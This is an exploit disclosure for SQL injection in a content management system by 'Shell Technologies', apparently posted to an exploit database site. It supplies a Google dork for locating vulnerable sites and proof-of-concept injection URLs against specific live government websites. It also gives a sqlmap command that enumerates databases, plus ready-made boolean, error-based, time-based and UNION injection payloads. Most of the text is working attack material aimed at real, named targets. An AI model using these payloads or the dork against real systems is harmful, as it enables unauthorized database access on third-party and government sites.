Shell Technologies CMS - SQL Injection

2021.07.14
ir Mr.B3nY (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================= # Exploit Title: Shell Technologies CMS - SQL Injection # Google Dork: intext:"Developed by Shell Technologies" inurl:".php?id=" # Date: 2021-07-08 # Exploit Author: Mr.B3nY # Vendor Homepage: www.shelltechnologiesbd.com # Tested on: Parrot OS # Vulnerability : SQL Injection Vulnerability ========================================================= [+] POC :- http://www.14upazilaudd.gov.bd/video-gallery.php?uap=3' [+] POC :- http://www.14upazilaudd.gov.bd/image_gallery.php?id=4' [+] POC :- http://www.mudp.gov.bd/video-gallery.php?uap=1' [+] POC :- http://www.mudp.gov.bd/photo-gallery.php?id=1' ========================================================= SQLMap ++++++++++++++++++++++++++ sqlmap -u "<url>/video-gallery.php?uap=3" --dbs ++++++++++++++++++++++++++ Parameter: uap (GET) Type: boolean-based blind Payload: uap=(SELECT (CASE WHEN (2253=2253) THEN 3 ELSE (SELECT 2255 UNION SELECT 1454) END)) Type: error-based Payload: uap=3 AND (SELECT 6256 FROM(SELECT COUNT(*),CONCAT(0x717a6a6b71,(SELECT (ELT(6256=6256,1))),0x7178766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Payload: uap=3 OR (SELECT 6023 FROM (SELECT(SLEEP(5)))SDyl) Type: UNION query Payload: uap=-2305 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6b71,0x5748654d506b485948766f4a43484969426b546971524351515a416952544f5844645a684a464b6b,0x7178766b71),NULL-- - =========================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top